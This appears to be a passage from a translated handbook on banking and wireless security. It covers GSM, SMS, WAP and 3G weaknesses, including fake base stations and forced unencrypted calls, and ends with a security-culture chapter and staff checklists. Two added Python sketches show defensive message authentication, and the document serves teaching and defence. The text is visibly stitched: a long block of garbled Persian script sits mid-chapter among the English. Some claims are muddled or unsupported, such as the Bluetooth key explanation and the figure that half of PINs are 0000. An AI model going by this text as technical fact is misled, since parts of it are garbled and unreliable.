[164] Encrypted GSM Conversation Key

The security of GSM technology depends on circumstances. A SIM card can be cloned. It can also be broken into, because its sensitive algorithms have been broken. This last problem can even lead to GSM phone calls becoming completely insecure.

There are other problems too when a bank uses GSM technology. For example, if a remote ATM cannot establish a connection with a genuine cell tower, it can be tricked into connecting to a fake tower. Doing so gives the intruder control over the transactions carried out at that ATM.

SMS vulnerability

GSM also provides the short message service (SMS).[165] SMS has a variety of uses in the GSM system, including voicemail notifications, updating the subscriber's SIM, sending short text messages, and communicating with e-mail gateways. Although these are widely used services, they create new security risks for the network. SMS is a store-and-forward messaging service that is inherently insecure, because all messages are exchanged as unencrypted plain text and are also stored unencrypted at the SMS centre before being forwarded to the destination. Another problem with SMS is delay in message delivery. Time-critical transactions cannot rely on this service. In addition, there are many free programs that can be used to forge SMS messages, to flood handsets and SMS centres with SMS bombs, or to craft SMS packets that crash the software on most handsets.

SIM Toolkit (STK)[166] technology can be used to encrypt SMS. However, STK is a transport layer[167] security mechanism and cannot guarantee end-to-end confidentiality.[168] Another procedure for improving SMS security could be personal verification by customers of an agreed message fragment, in order to vouch for the whole message and the service provider, and consequently verification of customers' registered phone numbers.

GPRS vulnerability

GPRS[169] is an IP-based service that provides an always-on connection to the Internet. The main problem with this mechanism is that it still depends on SMS for WAP requests. A spoofed SMS packet can be sent to a phone and open a fake website, tricking users into entering their information into a form that they believe is secure but that is in fact fraudulent. Many GPRS-capable phones are also Bluetooth-capable. Every Bluetooth-capable device has a unique address that lets the user place a degree of trust in the person at the other end of the connection. Once this identifier is associated with a user, that user's activities can be recorded by following messages and examining their identifier. To establish a connection, Bluetooth-based devices start an initialization process that uses a PIN for authentication. Although some devices let you enter the PIN, the PIN can also be stored in the memory of an electronic device or on a hard disk. If the device is not physically secure, numerous problems may result. Moreover, most PINs are four-digit numbers, and in perhaps half of all cases this number is 0000.

The security of Bluetooth depends on keeping the encryption key as a shared secret among the members of the network. But suppose you and I are in a conversation using our Bluetooth-capable mobile phones. To secure the conversation, I encrypt the conversation data using your key. A little later one of your friends calls you and you use your key again. Knowing your key, I can use a fake address to determine the type of encryption and listen to your conversation. I can also pass myself off as you or as the person talking to you. Bluetooth, therefore, authenticates only devices, not users.

[165] Short Message Service
[166] SIM Toolkit Technology
[167] Transport Layer
[168] End-to-End Confidentiality
[169] General Packet Radio Service

WAP weaknesses

The common weak point of all the devices examined, regardless of network type, is the Wireless Application Protocol (WAP)[170] standard, which consists of the Wireless Markup Language (WML)[171] and the Handheld Device Markup Language (HDML).[172] To make things easier, developers try as far as possible to design scenarios so that the user has to enter the shortest possible input when using the various services, for example the digits entered as a credit card number or personal account number. This means that most of this data is still stored on the server, and the handheld device holds only a cookie containing a password, which for tasks such as online shopping or funds transfer often requires only a PIN and sometimes not even that. The security of exchanges between devices on the wireless network is therefore the responsibility of another standard, called Wireless Transport Layer Security (WTLS).[173]

As long as the mobile 128-bit SSL[174] standard or the IPSec protocol (which most handsets do not support because of limited bandwidth and processing power) is not used, there is always a weak security link somewhere in the network that can be exploited. Even then, security weaknesses inside the device (as opposed to the communication channel) will remain, so the security of the connection is easily compromised. GSM uses WAP and WTLS, which is equivalent to SSL but with a weaker encryption algorithm. WTLS is not compatible with SSL, which is an industry standard. Wireless messages go to a gateway and from there enter a wired network to be routed to their final destination. At that gateway the WTLS message is converted to SSL. In the gateway the message is decrypted for a few seconds, and this makes the whole connection vulnerable to message theft.

E. Security solutions for GSM

The inherent flaws of GSM are not easy to fix. Phones and PDAs that use GSM technology are generally unable to run protective software. Although GSM is not vulnerable to war driving in the way its American counterpart, the 802.11 standard, is, it has several fundamental weaknesses. The 802.11 standard is for computers rather than handsets, so its security can be improved far more effectively than that of GSM. Virtual private networks (VPNs) are the common denominator of the vulnerabilities of these two standards, and using a VPN is usually regarded as a solution to the current vulnerabilities of 802.11 and GSM. In layered security, however, no single layer can be expected to work miracles. More information on the security of wireless networks can be found at the end of this part of the book and in Part Five (IT Security and Technical Administrators).

F. Banking security practices

As a result of the widespread use of GSM in electronic financial services, a number of control and security standards have emerged that financial institutions should take into account if they use wireless access in payment services.

Third-party payments

As a general rule, banks should authenticate their customers directly in wireless financial transactions. Some customers may give the bank standing authority to debit their account and credit the accounts of certain third parties. Such arrangements can be made through direct debit authorization agreements.[175] When these agreements are acted on, however, third parties must not be able to obtain or store customers' banking identifiers (IDs and PINs).

[170] Wireless Application Protocol
[171] Wireless Markup Language
[172] Handheld Device Markup Language
[173] Wireless Transport Layer Security
[174] Secure Socket Layer
[175] Direct Debit Authorization Agreements

Customer education

Banks should educate consumers of wireless electronic financial services in the following ways:

• Customers should be advised to use different PINs for different services.
• Customers should be given instructions on configuring mobile devices for safe use of mobile banking and payment applications.
• Customers should be given the necessary information on dispute handling, reporting procedures and the expected time for resolving complaints.

Stored value accounts

Stored value accounts (SVA)[176] are used by customers who periodically pay money into these accounts. An SVA can reside on mobile devices. No bank account should be accessed when a payment is made. To transfer funds from a bank account to an SVA, the holder of that bank account must carry out the transfer personally.

Close proximity wireless payments

Close proximity wireless payment[177] services are usually used for over-the-counter retail purchases. These transactions should be completed only when the customer has been explicitly authenticated at the point of sale. Without such authentication, the customer's bank account could be unintentionally overdrawn through the associated SVA. Explicit customer authentication must therefore be mandatory for every payment request.

Interactive voice response

Mobile interactive voice response (Mobile IVR)[178] services are vulnerable to eavesdropping. IVR systems should not be used for high-value or high-risk services. All IVR connections, including the caller's phone number and the sequence of transactions carried out by the customer, must be logged; but these logs must never include the customer's PIN or authentication information.

[176] Stored Value Accounts
[177] Close Proximity Wireless Payments
[178] Mobile Interactive Voice Response
[179] False Base Station

Looking ahead: third-generation technology

The third generation of wireless technology, abbreviated 3G, refers to advances in wireless communications across various standards. The initial aim of this programme is to raise transmission speeds from 9.5 kilobits per second to 2 megabits per second. Where the security of systems and communications is concerned, the main goal is not to design a flawless system but to design one that can adapt to security advances when the need arises. Many of the attacks that were possible on second-generation networks, and even on somewhat more advanced ones, have been eliminated entirely in third-generation environments.

Strength of the third-generation security architecture

Third-generation security is built on GSM security, but with the following changes:

• One change was made to defeat an attack known as the false base station.[179] In this security mechanism a sequence number is added to the authentication data, which ensures that the mobile device can identify the network.
• The key length has been increased so that stronger encryption algorithms can also be used.
• Mechanisms have been included to improve security within networks and in communications between them.
• Security is now based on the switch rather than on the base station (as in GSM). The links between the base station and the switch are therefore protected.
• Integrity mechanisms for the terminal identity (IMEI)[180] have been designed afresh, in place of those that existed in GSM.
• The authentication algorithm is not defined, but guidance is given for choosing one.
• When roaming between networks, for example between GSM and 3GPP, only the level of protection supported by the smart card is applied. A GSM smart card in a 3GPP network therefore remains unprotected against the false base station attack.
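
The first change listed above, a sequence number added to the authentication data so that the handset can verify the network, can be illustrated with the following added example, which is not part of the original handbook. It is a simplified sketch: HMAC-SHA256 stands in for the real 3G authentication functions, and all class and function names are hypothetical.

```python
"""Sketch of network authentication with a sequence number (3G-style).

Assumptions for illustration only: HMAC-SHA256 stands in for the operator's
authentication functions, and the real protocol's concealment of the
sequence number and its resynchronisation procedure are left out.
"""
import hashlib
import hmac
import os

MAC_LEN = 8   # bytes of authentication tag carried with the challenge
SQN_LEN = 6   # bytes used to encode the sequence number


def network_mac(key: bytes, rand: bytes, sqn: int) -> bytes:
    """Tag that binds the random challenge to the sequence number."""
    msg = rand + sqn.to_bytes(SQN_LEN, "big")
    return hmac.new(key, msg, hashlib.sha256).digest()[:MAC_LEN]


class HomeNetwork:
    """Holds the subscriber key and issues fresh authentication challenges."""

    def __init__(self, key: bytes):
        self.key = key
        self.sqn = 0

    def challenge(self):
        self.sqn += 1                      # never reuse a sequence number
        rand = os.urandom(16)
        return rand, self.sqn, network_mac(self.key, rand, self.sqn)


class Handset:
    """Smart-card side: authenticate the network before answering it."""

    def __init__(self, key: bytes):
        self.key = key
        self.highest_sqn = 0               # highest sequence number accepted

    def verify_network(self, rand: bytes, sqn: int, mac: bytes) -> str:
        expected = network_mac(self.key, rand, sqn)
        if not hmac.compare_digest(expected, mac):
            return "reject: bad MAC"       # sender does not hold the key
        if sqn <= self.highest_sqn:
            return "reject: stale sequence number"   # recorded challenge
        self.highest_sqn = sqn
        return "accept"


def run_scenarios() -> dict:
    key = bytes(range(16))                 # constructed subscriber key
    network, phone = HomeNetwork(key), Handset(key)
    results = {}

    genuine = network.challenge()
    results["genuine network"] = phone.verify_network(*genuine)

    # A station without the subscriber key cannot produce a valid tag.
    results["no key"] = phone.verify_network(os.urandom(16), 99, bytes(MAC_LEN))

    # A recorded genuine challenge presented again fails the freshness check.
    results["replay"] = phone.verify_network(*genuine)

    # Changing the sequence number of a fresh challenge invalidates its tag.
    rand, sqn, mac = network.challenge()
    results["altered sqn"] = phone.verify_network(rand, sqn + 5, mac)
    results["next genuine"] = phone.verify_network(rand, sqn, mac)
    return results


if __name__ == "__main__":
    for name, outcome in run_scenarios().items():
        print(f"{name}: {outcome}")
```

A GSM-style card has no equivalent of `verify_network`: it answers whatever challenge it receives, which is why the last change in the list leaves a GSM smart card unprotected even on a 3GPP network.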
‫ﺳﻴﺴﺘﻢ ﻧﺴﻞ ﺳﻮﻡ ﻧﺴﺒﺖ ﺑـﻪ ﻫﻤﺘـﺎﻱ ‪ GSM‬ﺧـﻮﺩ ﺍﺯ ﺍﻣﻨﻴـﺖ‬
‫ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ .‬ﺍﻟﺒﺘﻪ ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﮔﻔﺘـﻪ ﺷـﺪ‬
‫ﻫﻮﺷﻤﻨﺪﻱ ﻭ ﺯﻳﺮﻛﻲ ﻣﻬﺎﺟﻤﻴﻦ ﺭﺍ ﻫﻴﭽﮕـﺎﻩ ﻧﺒﺎﻳـﺪ ﺩﺳـﺖ ﻛـﻢ‬
‫ﮔﺮﻓﺖ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﺯ ﺩﻳﺪ ﻣﺒﺘﻨﻲ ﺑﺮ ﺗﺌﻮﺭﻱ‪ ،‬ﺩﺭ ﺷـﺒﻜﻪﻫـﺎﻱ ﻧـﺴﻞ‬
‫ﻼ ﺑﻪ ﺁﻧﻬﺎ‬
‫ﺳﻮﻡ ﻧﻴﺰ ﺍﻣﻜﺎﻥ ﻭﻗﻮﻉ ﺣﻤﻼﺕ ﺟﺪﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺫﻳ ﹰ‬
‫ﺍﺷﺎﺭﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺍﻋﺘﻤﺎﺩ ﺑﻪ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠﻲ‬
‫ﺍﻳﻦ ﺣﻤﻠﻪ‪ ،‬ﺣﻤﻠﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﻳﺎ ﺍﻳـﺴﺘﮕﺎﻩ‬
‫ﺳﻴﺎﺭ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻭ ﺍﺯ ﺍﻳﻦ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻱ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﺭﺑﺮ ﺑﻪ ﻳـﻚ ﺍﻳـﺴﺘﮕﺎﻩ ﺛﺎﺑـﺖ ﺟﻌﻠـﻲ‬
‫ﻣﺘﺼﻞ ﺷﻮﺩ‪ .‬ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠﻲ ﻣﻲﺗﻮﺍﻧﺪ ﮔﺎﻫﻲ ﺩﺭ ﻧﻘﺶ‬
‫ﺗﻜﺮﺍﺭﻛﻨﻨﺪﻩ ﻭ ﮔﺎﻫﻲ ﻧﻴﺰ ﺩﺭ ﻧﻘﺶ ﺗﻘﻮﻳـﺖﻛﻨﻨـﺪﺓ ﺩﺭﺧﻮﺍﺳـﺘﻬﺎﻱ‬
‫ﺗﺒــﺎﺩﻟﻲ ﻣﻴــﺎﻥ ﺷــﺒﻜﻪ ﻭ ﻛــﺎﺭﺑﺮ ﻋﻤــﻞ ﻛﻨــﺪ‪ ،‬ﻭ ﺩﺭ ﺍﻳــﻦ ﻣﻴــﺎﻥ‬
‫ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﻳﺎ ﭘﻴﺎﻣﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ‪.‬‬
‫ﻣﻌﻤﺎﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺩﺳﺘﻜﺎﺭﻱ ﭘﻴﺎﻣﻬﺎﻱ ﺗﺒـﺎﺩﻟﻲ ﻣﻴـﺎﻥ‬
‫ﺷﺒﻜﻪ ﻭ ﻛﺎﺭﺑﺮ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﺪ‪ .‬ﺣﻔﺎﻇـﺖ ﺍﺯ ﺟﺎﻣﻌﻴـﺖ ﭘﻴﺎﻣﻬـﺎﻱ‬
‫ﺣﻴﺎﺗﻲ ﺷﺒﻜﻪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﻪ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻭﻗـﻮﻉ ﺑﺮﺧـﻲ ﺣﻤـﻼﺕ‬
‫ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ‪ -‬ﻛﻪ ﺑﺎ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴﺮ ﺩﺭ ﻣﺤﺘﻮﺍﻱ ﭘﻴﺎﻡ ﺻـﻮﺭﺕ‬
‫ﻣﻲﮔﻴﺮﺩ ‪ -‬ﻧﻴﺰ ﻛﻤﻚ ﻛﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺠﺎ‪ ،‬ﺣﻤﻠـﺔ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ‬
‫ﺗﻨﻬﺎ ﺗﺎ ﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺩﺍﻣـﻪ ﻳﺎﺑـﺪ ﻛـﻪ ﻧﻔـﻮﺫﮔﺮ ﻓﻌـﺎﻝ ﺑﺎﺷـﺪ؛‬
‫ﺑﺮﺧﻼﻑ ﺣﻤﻼﺕ ﺑﺎﻻ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﭘﺎﻳﺎﻥ ﺩﺧﺎﻟﺖ ﻧﻔﻮﺫﮔﺮ ﻫﻢ ﺍﺩﺍﻣﻪ‬
‫‪180 Integrity Mechanisms for the Terminal Identity‬‬
‫ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﺣﻤﻼﺕ ﻗﺎﺑﻞ ﻗﻴﺎﺱ ﺑﺎ ﺣﻤﻼﺗﻲ ﭼﻮﻥ ﺍﺭﺳﺎﻝ‬
‫ﭘﺎﺭﺍﺯﻳﺘﻬﺎﻱ ﺭﺍﺩﻳﻮﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺍﮔﺮ ﺑﺨـﻮﺍﻫﻴﻢ ﺁﻧﻬـﺎ ﺭﺍ ﺩﺭ ﺗﻤـﺎﻡ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﺩﻳﻮﻳﻲ ﺧﻨﺜﻲ ﻛﻨﻴﻢ‪ ،‬ﺑﺎ ﻣـﺸﻜﻼﺕ ﺯﻳـﺎﺩﻱ ﺭﻭﺑـﺮﻭ‬
‫ﻫﺴﺘﻴﻢ‪.‬‬
‫ﺍﺟﺒﺎﺭ ﺑﻪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﻣﺰ ﻧﺸﺪﻩ‬
‫ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻠﻪ ﻧﻴﺰ ﺑﻪ ﻳـﻚ ﺍﻳـﺴﺘﮕﺎﻩ ﺛﺎﺑـﺖ ﻳـﺎ ﺍﻳـﺴﺘﮕﺎﻩ ﺳـﻴﺎﺭ‬
‫ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﻧﻴﺎﺯ ﺩﺍﺭﺩ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﻛﺎﺭﺑﺮ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑـﻪ ﺍﻳـﺴﺘﮕﺎﻩ‬
‫ﺛﺎﺑﺖ ﺟﻌﻠﻲ ﺍﻋﺘﻤﺎﺩ ﻣﻲﻛﻨﺪ‪ ،‬ﻣﻬﺎﺟﻢ ﻗﺮﺑـﺎﻧﻲ ﺭﺍ ﺑـﺎ ﻳـﻚ ﺗﻤـﺎﺱ‬
‫ﺗﻠﻔﻨﻲ ﻣﺨﺎﻃﺐ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪ .‬ﻛﺎﺭﺑﺮ ﻧﻴﺰ ﺭﻭﺍﻝ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺍﻭﻟﻴـﻪ ﺭﺍ‬
‫ ﻛﻪ ﻣﻬﺎﺟﻢ ﻣﻴﺎﻥ ﺷﺒﻜﺔ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﻭ ﺍﻭ ﺑﺮﻗﺮﺍﺭ ﻛـﺮﺩﻩ‬‫ ﺁﻏﺎﺯ ﻣﻲﻛﻨﺪ ﻭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻋﻨﺎﺻﺮ ﺍﺭﺳﺎﻝ ﺳﻴﮕﻨﺎﻟﻬﺎ ﻃﻮﺭﻱ‬‫ﺗﻐﻴﻴﺮ ﻛﻨﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺷﺒﻜﻪ ﺍﻳﻨﻄﻮﺭ ﺑﻨﻈﺮ ﺑﺮﺳﺪ ﻛﻪ ﮔﻮﻳﻲ ﻛـﺎﺭﺑﺮ‬
‫ﻣﻮﺭﺩ ﻧﻈﺮ ﻧﻤﻲﺧﻮﺍﻫﺪ ﺩﺭ ﺗﺒﺎﺩﻝ ﺩﺍﺩﻩﻫـﺎ ﺍﺯ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﺪ‪ .‬ﭘﺲ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﻣﻬﺎﺟﻢ ﺍﺭﺗﺒـﺎﻁ ﺧـﻮﺩ ﺑـﺎ ﻛـﺎﺭﺑﺮ ﺭﺍ‬
‫ﻗﻄﻊ ﻣـﻲﻛﻨـﺪ ﻭ ﺑـﺎ ﺣـﻖﺍﺷـﺘﺮﺍﻙ ﺁﻥ ﻛـﺎﺭﺑﺮ‪ ،‬ﺍﺯ ﺷـﺒﻜﻪ ﺑـﺮﺍﻱ‬
‫ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺳﻬﺎﻱ ﺟﻌﻠﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
Protecting the integrity of messages can prevent this type of attack. In particular, data authentication and preventing connection requests from being sent indirectly allow the network to recognize the validity of legitimate requests. In addition, sending integrity-protected messages periodically during a connection helps prevent unencrypted connections from being hijacked after the connection has first been established. Hijacking a connection between the periodic protected messages is nevertheless possible, although it is usually of little use to intruders. In general, connections whose encryption is disabled are always vulnerable to a class of attacks.
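As an added illustration (not part of the handbook), the sketch below shows how message authentication with a sequence counter lets a network reject an altered or resent connection request, and how periodic protected messages bound the time a hijacked unencrypted connection stays up. The message fields, the shared key and all function names are assumptions of this sketch, not the formats of any mobile standard.

```python
import hashlib
import hmac
import json

# Constructed sample key. It stands in for the integrity key that the terminal
# and the network share after authentication (an assumption of this sketch).
INTEGRITY_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")


def _encode(body: dict) -> bytes:
    # Canonical encoding so both sides compute the MAC over identical bytes.
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()


def protect(key: bytes, seq: int, fields: dict) -> dict:
    """Terminal side: add a sequence number and an HMAC-SHA-256 tag."""
    body = dict(fields, seq=seq)
    tag = hmac.new(key, _encode(body), hashlib.sha256).hexdigest()
    return {"body": body, "mac": tag}


class Network:
    """Network side: accept a message only if its tag verifies and seq is new."""

    def __init__(self, key: bytes):
        self._key = key
        self._last_seq = -1

    def verify(self, message: dict) -> str:
        body = message.get("body")
        tag = message.get("mac")
        if not isinstance(body, dict) or not isinstance(tag, str):
            return "rejected: malformed message"
        expected = hmac.new(self._key, _encode(body), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, tag):
            return "rejected: integrity check failed"
        seq = body.get("seq")
        if not isinstance(seq, int) or seq <= self._last_seq:
            return "rejected: sequence number already used"
        self._last_seq = seq
        return "accepted"


def release_time(network: Network, events: list, max_gap: int):
    """Return the time at which the network drops the connection, or None.

    events is a list of (time, message) pairs in time order, ending with a
    (time, None) marker for the end of the observed period. The network
    expects a valid integrity-protected message at least every max_gap time
    units and releases the connection once that deadline has passed.
    """
    deadline = None
    for time, message in events:
        if deadline is not None and time > deadline:
            return deadline
        if message is not None and network.verify(message) == "accepted":
            deadline = time + max_gap
    return None


def demo() -> dict:
    results = {}

    # 1. Genuine request: the terminal asks for a ciphered connection.
    net = Network(INTEGRITY_KEY)
    request = protect(INTEGRITY_KEY, 1, {"type": "setup", "ciphering": True})
    results["genuine"] = net.verify(request)

    # 2. The same request sent a second time (for example by a relay) is refused.
    results["resent"] = net.verify(request)

    # 3. A relay rewrites the ciphering flag but cannot recompute the tag.
    net = Network(INTEGRITY_KEY)
    tampered = {"body": dict(request["body"], ciphering=False),
                "mac": request["mac"]}
    results["tampered"] = net.verify(tampered)

    # 4. Periodic protected messages: the terminal sends valid messages at
    #    t=0 and t=10, then a party without the key takes over the channel.
    net = Network(INTEGRITY_KEY)
    forged = {"body": {"type": "keepalive", "seq": 3}, "mac": "00" * 32}
    events = [
        (0, protect(INTEGRITY_KEY, 1, {"type": "setup", "ciphering": False})),
        (10, protect(INTEGRITY_KEY, 2, {"type": "keepalive"})),
        (20, forged),
        (30, forged),
        (40, None),
    ]
    results["released_at"] = release_time(net, events, max_gap=10)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

In the fourth case the connection is released at t=20, so the party without the key holds it only for the interval between two periodic checks, which is the residual window the paragraph above mentions.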
We note once again that attacks of this kind are all theoretical, depending on how the technology is used. Overall, third-generation systems have advanced in terms of security technology, but supporting the security of mobile communications requires that other security precautions also be observed continuously.
G. Conclusion
The more distributed networks are, the greater the scope for eavesdropping and unauthorized access in them. The greatest vulnerability to eavesdropping usually lies at the points where fiber cables, copper wires, satellite and terrestrial wireless systems interconnect. Air-interface standards are one example, in modern telecommunications and information technology systems, of something that can be eavesdropped on.
One possible solution is to revisit the ISO seven-layer communications model and, in particular, to create a new layer that provides the necessary security on the basis of an updatable 256-bit or even 1024-bit code. Whether the final way to reach this goal is a new layer, or whether better results can be obtained by re-engineering part of the existing layers, still needs further study. In any case, the risks of wireless financial services remain very high.
The threats that the 802.11 and GSM protocols pose to the confidentiality and integrity of communications can be reduced to a large extent. Besides the use of VPNs, protecting gateways and servers is also essential. It is very important for banks to use various other methods to protect network resources alongside the use of VPNs for authorized access. Banks and their telecommunications partners must implement layered security mechanisms, especially at the gateway level.
As business and the economy make ever greater use of integrated and vulnerable technologies, reducing the risks of mobile communications technology becomes more vital. The growing adoption of wireless local area networks and GSM technology by economic institutions has weakened the security of payment systems, even though these vulnerable interfaces were not originally designed for exchanging digital assets. As the trend toward electronic financial services continues, "mobile risk management" will become increasingly important for the banking industry in the coming years.
As Pelton Merge¹⁸¹ has pointed out, "This market trend has been toward continued improvement of seamless interface standards, which has made it possible to connect different technologies such as fiber, copper wire, terrestrial wireless, satellite and other emerging technologies flawlessly; the challenge arises when we want to produce a standard that provides security as well as reliable and simple communication between these technologies."
181 Pelton Merge
Chapter Eleven
Best Practices: Building a Security Culture
Overview
Up to this point, Part Three has examined the role of security and its functions in different kinds of organizations, including small and medium-sized organizations, non-profit institutions, educational institutions, and government offices. The discussions of responsibility for organizational security stressed that one person must take the lead, but did not assume that this person would hold a dedicated position in the organization such as "chief security officer" (except in large organizations). Small and medium-sized organizations usually face limits on budget and staff, so it is rarely possible to have someone serve as chief security officer or as a full-time security specialist. Even so, every company that is involved with technology in some way must have one person, or at most a small group of security specialists, at its disposal. Consistent guidelines, appropriate standards for preparing reports, and alert yet friendly relations with other employees, outside contractors, vendors, and customers are all factors that can help this group or individual carry out the activities the organization needs.
This chapter makes detailed suggestions about using layered security and also presents a twelve-layer security policy. It then gives a selection of security checklists that, by reminding employees and members of the management team of their daily duties toward the organization's safety, help keep security from being compromised.¹⁸²
Best Practices: Twelve Layers of Electronic Security
Managing security risk can be seen as a two-sided process. The first stage is risk assessment, which has three main parts: identifying and inventorying assets, analyzing and determining the value of each asset, and determining how critical each asset is, in order of priority. The second step of security is to develop an approach to managing the risks. The main parts of this stage are developing and implementing policies and procedures, training users (both employees and customers), and review and monitoring for quality assurance and control. A sensible view holds: "Accept that you may become the target of an attack, and plan for your survival."
Three general principles should be kept in mind when developing a security plan:
• Attacks and damage are inevitable;
• Providing security is a time-consuming process; and
• A network is at most as secure as its weakest component.
To preserve data integrity and reduce the risks of open-architecture environments, twelve core layers of security must be considered; experience has shown that implementing any of these layers properly does not require a huge investment.
1. Information security officer - creating an information security management position that makes sure the other eleven layers are addressed in the organization's policies and are implemented properly according to the best practices below.¹⁸³
2. Risk management - a broad concept, based on the OCTAVE model belonging to CERT, for managing assets and the risks associated with them.
3. Access controls and authentication - checking that a computer or user is authorized before granting access to the requested information. During this process the user enters a name or account number (identification data) and then a password (authentication data) into the system. Access controls are the first line of defense and can be based on passwords, tokens, biometrics, or public key infrastructure.
4. Firewalls - creating a system, or a combination of several systems, that marks the boundary between two or more networks.
5. Active content filtering - at the web-browser level, anything that is not appropriate for the workplace or that conflicts with approved policies must be filtered.
6. Intrusion detection system (IDS) - a system dedicated to identifying intrusions or intrusion attempts, intrusions that may be carried out manually or with the help of software expert systems. This system uses log files¹⁸⁴ and other network information. Monitoring methods vary widely, depending on factors such as the types of attack the system must be able to defend against, the origins of intrusions, the types of assets, and the level of concern about each threat.
7. Virus scanners - worms, Trojans, and viruses are all tools for carrying out attacks. A virus is a program that can spread itself by infecting system programs. Trojans do not spread themselves or attach themselves to other files. Virus scanners find and disable malicious and harmful programs.
8. Encryption - encryption algorithms are used to protect information that is in transit or exposed to theft (from storage media, for example backup media or a portable computer).
9. Vulnerability testing - the purpose of this test is to obtain information about the vulnerabilities present in a computer or network and to use this information to get past the usual authentication barriers and ultimately gain access to the various resources of that computer or network.
10. Proper systems administration - this item should be completed with a list of the common administration mistakes that generally occur in financial institutions or companies, together with a list of best practices.
11. Policy management software - a software program should monitor the proper enforcement of the policies and procedures that have been developed for employees' use of computers.
12. Incident response plan (IRP)¹⁸⁵ and business continuity plan (BCP)¹⁸⁶ - this is the most fundamental document in which the organization states how it identifies a security incident, responds to it, and repairs the damage it causes. Having an IRP and testing it periodically is one of the most essential means of establishing security.
182 Source: Glaessner, Thomas, Kellerman, Tom, McNevin, "Electronic Security: Risk Mitigation in Financial Transactions - Public Policy Issues", June 2002, The World Bank
183 For more details, see the following book by Glaessner, Kellerman, and McNevin: "Electronics Security: Risk Mitigation in Financial Transaction"
As we saw in earlier chapters, security awareness is key to creating an environment in which employees can best cooperate in protecting their organization. Employees are influenced by how managers treat the security rules and by how much they invest in security training, security communications, and other related areas.
Staff Responsibilities
To promote a security culture, managers must:
• Emphasize that security is very important at all levels of the organization.
• Encourage people to ask questions about security technologies and procedures.
• Ask all staff to be very vigilant in this regard and to report any unusual activity (in the office or on the network).
• Make clear what is being done to protect the privacy and safety of staff, and make it plain to everyone that loyalty to the organization comes first and that deliberate security breaches cannot be overlooked.
• Explain what the elements of a good security program are.
This checklist is intended for the company executives who lead the implementation of security policies.
Executive Support Checklist¹⁸⁷
• Is there a clear line of communication from the upper levels of management to production-line staff?
• Does everyone know what that line of communication is and where it is?
• Has responsibility for security been explicitly assigned to one of the managers, for example the organization's deputy chief executive, the security manager, or another of its managers?
• Has management shown its commitment to the organization's security program by presenting and enforcing it?
• Has appropriate investment been made in the security programs, and has the corresponding budget actually been allocated to them?
• Do all administrators of the various systems understand the importance of reporting and quickly resolving security problems?
• Has raising security awareness been adopted as part of the organization's programs for new employees at every level, from production-line staff to senior management?
• Have the necessary steps been taken to ensure that employees of all ranks are aware of the company's information protection policies?
• Were the realities of the company's culture (relations between managers and employees) taken into account when the security policies and procedures were developed?
• Do employees know whom to ask for help when they run into security problems (or where they are unsure of their duties)?
• Are security reviews and audits performed regularly? Every six months? Every year?
The following list is designed to help managers train staff to cooperate in keeping the organization secure:
Security Training Checklist¹⁸⁸
• Are managers at all levels committed to an organizational security program?
• Have they backed this commitment by investing in security training?
• Does the training program also cover the details of configuring and supporting security?
• Are there defined policies for security training?
• Are these policies complete and up to date, and are staff aware of them?
• Are management summaries prepared regularly? How often?
• Have all employees (including executives) been trained in their security responsibilities toward the company?
